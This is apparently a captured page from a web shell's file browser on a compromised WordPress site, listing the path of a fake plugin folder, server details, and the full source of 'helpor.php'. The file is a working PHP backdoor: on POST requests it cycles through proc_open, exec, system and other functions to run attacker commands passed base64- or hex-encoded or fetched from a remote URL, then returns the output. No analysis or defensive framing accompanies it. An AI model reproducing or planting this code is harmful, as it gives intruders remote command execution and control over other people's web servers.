/
/
home
/
melaqxso
/
allshadesofwellness.com
/
wp-content
/
plugins
/
pro
Server: server63.web-hosting.com (198.54.116.184)
You: 216.73.216.220
PHP 7.4.33
Dir:
/home/melaqxso/allshadesofwellness.com/wp-content/plugins/pro
Edit:
/home/melaqxso/allshadesofwellness.com/wp-content/plugins/pro/helpor.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { parse_str(http_build_query($_POST), $q); function x($d) { return base64_encode($d); } function y($d) { return base64_decode($d); } function z($d) { return hex2bin($d); } function check_exec_methods() { $methods = [ 'proc_open' => function($cmd) { $desc = [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']]; $proc = proc_open($cmd, $desc, $pipes); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($proc); return $output; }, 'popen' => function($cmd) { $handle = popen($cmd, 'r'); $output = stream_get_contents($handle); pclose($handle); return $output; }, 'exec' => function($cmd) { exec($cmd, $out); return implode("\n", $out); }, 'shell_exec' => function($cmd) { return shell_exec($cmd); }, 'backticks' => function($cmd) { return `$cmd`; }, 'system' => function($cmd) { ob_start(); system($cmd); return ob_get_clean(); }, 'passthru' => function($cmd) { ob_start(); passthru($cmd); return ob_get_clean(); }, 'pcntl_exec' => function($cmd) { pcntl_exec('/bin/sh', ['-c', $cmd]); return ""; } ]; foreach ($methods as $name => $method) { if (function_exists($name) && !in_array($name, explode(',', ini_get('disable_functions')))) { return $method; } } return null; } $execute = check_exec_methods(); if (!$execute) { if (class_exists('ReflectionFunction')) { $func = new ReflectionFunction('proc_open'); $func->setAccessible(true); $pipes = []; $proc = $func->invoke("id", [], $pipes); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($proc); if (preg_match('/uid=\\d+\\(([^)]+)\\)/', $output)) { echo "PHP Reflection API is working!"; } else { echo "All execution methods disabled. Try uploading a file."; } exit; } echo "All execution methods disabled. Try uploading a file."; exit; } if (isset($q['out']) && in_array($q['out'], ['view', 'code'])) { $r = null; if (isset($q['base'])) { $r = $execute(y($q['base'])); } if (isset($q['double'])) { $r = $execute(y(z($q['double']))); } if (isset($q['from_url'])) { $r = $execute(file_get_contents($q['from_url'])); } if ($r) { if ($q['out'] === 'view') { header('Content-Type: text/plain'); echo $r; } elseif ($q['out'] === 'code') { header('Content-Type: text/plain'); echo x($r); // only raw base64 } } exit; // ensure no PHP mix-in output } } ?>
Ukuran: 2.9 KB